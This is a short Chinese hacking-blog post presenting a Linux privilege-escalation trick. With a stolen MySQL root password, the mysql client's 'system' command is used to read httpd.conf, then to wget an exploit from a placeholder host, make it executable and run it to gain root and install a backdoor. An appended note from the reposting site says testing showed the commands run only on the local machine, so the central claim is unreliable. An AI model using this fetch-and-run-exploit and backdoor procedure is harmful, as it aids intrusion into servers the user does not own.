最新linux提权之mysql的root权限通过system函数提权

linux提权,本文为您讲述一种linux提权方法，这是一种常见的linux提权技术..

linux系统环境下，mysql以root权限登录时提权

mysql5.x 的linux版本下面有一个函数，可以帮助我们干很多猥琐的事情，这个函数4。x下面貌似没有，原来一直没发现，也没去查函数手册，就我自己的经验来写点东西。4,x的 明天再看看函数手册，再装一个实验一下。

mysql 5.x里面引入了一个system函数，这个函数可以执行系统命令，当mysql以root登陆的时候，就可以利用这个函数执行命令，当然是在权限许可的 范围内。

一般我们按照常规思路，搞到mysql的root密码之后，我们都会连接上去，创建一个表，然后outfile，搞到一个webshell ,然后提权如斯这般。今天我们换一种方式。

按照上面的方法，我们需要知道web的绝对路径，当然这个很不好找，有些有sqlinjection的，可能报错会显示出来，有的就不一定了。但是 按照我的的方法，没有必要再去找web路径了，直接执行

mysql>system vi /etc/httpd/conf/httpd.conf;
直接这样就可以找到web的路径，当然，我们的目的并不是找web路径，放webshell进去。我们是要来做其他的事情，好比，下载exp执行， 搞到 root权限，然后装后门


mysql>system wget http://www.xxx.com/xxxx ;   

mysql>system chmod +x xxxx;   mysql>system ./xxxx;  
这样mysql的root此时就成为system的root了，剩下的事情，假如开了ssh,就ssh连接上去，输入mysql的用户密码，ok,搞 定。

~~~~~~~~~~~~~~~~~~~~~~~~~~`

此方法经本站测试是不管用的，执行命令是在本地执行，而非远程服务器. 比如 执行 system ls; 则列出本地服务器文件

此文章网上流传很多，只是转来给大家提供一种思路，也可能是我测试有问题。仁者见仁，智者见智。请大家把测试结果留言在下面，共同交流。

更多LINUX提权视频和教程 请访问  http://www.linuxso.com/a/video/hacking/